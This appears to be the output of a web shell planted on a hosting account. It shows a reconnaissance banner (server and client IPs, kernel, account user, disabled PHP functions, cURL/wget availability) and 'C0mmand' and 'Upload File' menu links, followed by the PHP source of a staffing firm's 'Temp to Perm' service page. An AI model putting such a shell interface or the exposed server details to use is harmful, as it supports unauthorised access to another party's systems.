|
Server IP : 145.79.58.44 / Your IP : 216.73.216.33 Web Server : LiteSpeed System : Linux in-mum2-web2213.main-hosting.eu 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64 User : u882412079 ( 882412079) PHP Version : 8.3.30 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u882412079/domains/zendeskglobal.com/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include 'header.php';
?>
<!-- start page-title -->
<section class="page-title">
<div class="container">
<div class="title-box">
<h1>Temp to Perm</h1>
<ol class="breadcrumb">
<li><a href="index.php">Home</a></li>
<li>Temp to Perm</li>
</ol>
</div>
</div> <!-- end container -->
</section>
<!-- end page-title -->
<!-- start blog-single-content -->
<section class="blog-single-content section-padding serviceDetail">
<div class="container">
<div class="row blog-with-sidebar">
<div class="col col-lg-4 col-md-4">
<img src="images/product/service/s3.png" class="img-responsive">
</div>
<div class="col col-lg-8 col-md-8">
<div class="post">
<div class="post-title-meta">
<h2>Temp to Perm</h2>
</div>
<div class="post-body" style="margin-top: 20px;">
<p>Find that perfect-fit candidate. ZenDesk Global’s temp-to-hire option enables you to evaluate talent and cultural fit on the job before making an offer, reducing your hiring risk and increasing placement success. Feeling a little anxious about making an offer? A temp to perm contract gives you and our employee a chance to test the waters, and test whether the role is a good fit for both parties. The temporary employee goes on our payroll for the first few months, and when you are ready to transition them to a permanent role, we make the process smooth and seamless. What could be easier?</p>
</div>
</div> <!-- end post -->
</div> <!-- end blog-content -->
</div>
</div> <!-- end container -->
</section>
<!-- end blog-single-content -->
<!-- start cta -->
<section class="cta parallax" data-bg-image="images/cta-bg.jpg">
<div class="container">
<div class="row">
<div class="col col-xs-12">
<h5>Are you ready to start your business?</h5>
<a href="contact.php" class="btn">Request Quote</a>
</div>
</div> <!-- end row -->
</div> <!-- end container -->
</section>
<!-- end cta -->
<?php
include 'footer.php';
?>